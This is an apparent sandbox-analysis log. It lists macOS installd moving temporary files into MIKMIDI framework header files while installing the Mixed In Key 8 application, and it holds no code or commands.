Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_tWwOOW -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaEvent.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_Nfma0u -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIProgramChangeCommand.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_JdrHcP -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDICommand_SubclassMethods.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_bfGAmC -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMappingItem.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_hajBZI -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaLyricEvent.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_irbY3B -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaInstrumentNameEvent.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_Yj1cLZ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIInputPort.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_0DKQQ8 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDISystemKeepAliveCommand.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_3oyF1d -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIChannelEvent.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_ZJTPRD -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDISequencer.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_cDSpsD -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIPolyphonicKeyPressureCommand.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_ZOEHvE -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaSequenceEvent.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_Z9xX8s -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMapping.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_auGEj1 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIEvent.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_G1UaYH -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIChannelPressureCommand.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_KNWeet -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDICommandThrottler.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_jNE5sR -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDISystemExclusiveCommand.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_VCe8V0 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaCopyrightEvent.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_FXtJLj -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDITempoEvent.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_kMt4C7 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIPitchBendChangeEvent.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_jvOB1R -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDICommandScheduler.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_RJiba4 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIControlChangeEvent.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_gtlElV -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIEntity.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_VUEVVN -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDISynthesizerInstrument.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_6fiXSw -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIObject.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_syQVRJ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDISynthesizer.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_0E2xJl -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDISequence.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_w0Z4PF -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetronome.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_GMrzd3 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIPitchBendChangeCommand.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_m2ysU7 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaEvent_SubclassMethods.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_a3GhaG -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIControlChangeCommand.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_d7QdNU -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIDestinationEndpoint.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_Xlbe46 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDITransmittable.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_RfQIr0 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIChannelPressureEvent.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_JwpEE6 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIConnectionManager.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_957Thg -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDINoteCommand.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_apoMvq -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIClock.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_Lo7eHv -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIOutputPort.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_aXjYAP -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaCuePointEvent.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_JVmiIF -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDINoteEvent.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_IhbC26 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDICommand.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_OnFab0 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaTrackSequenceNameEvent.h	Jump to behavior
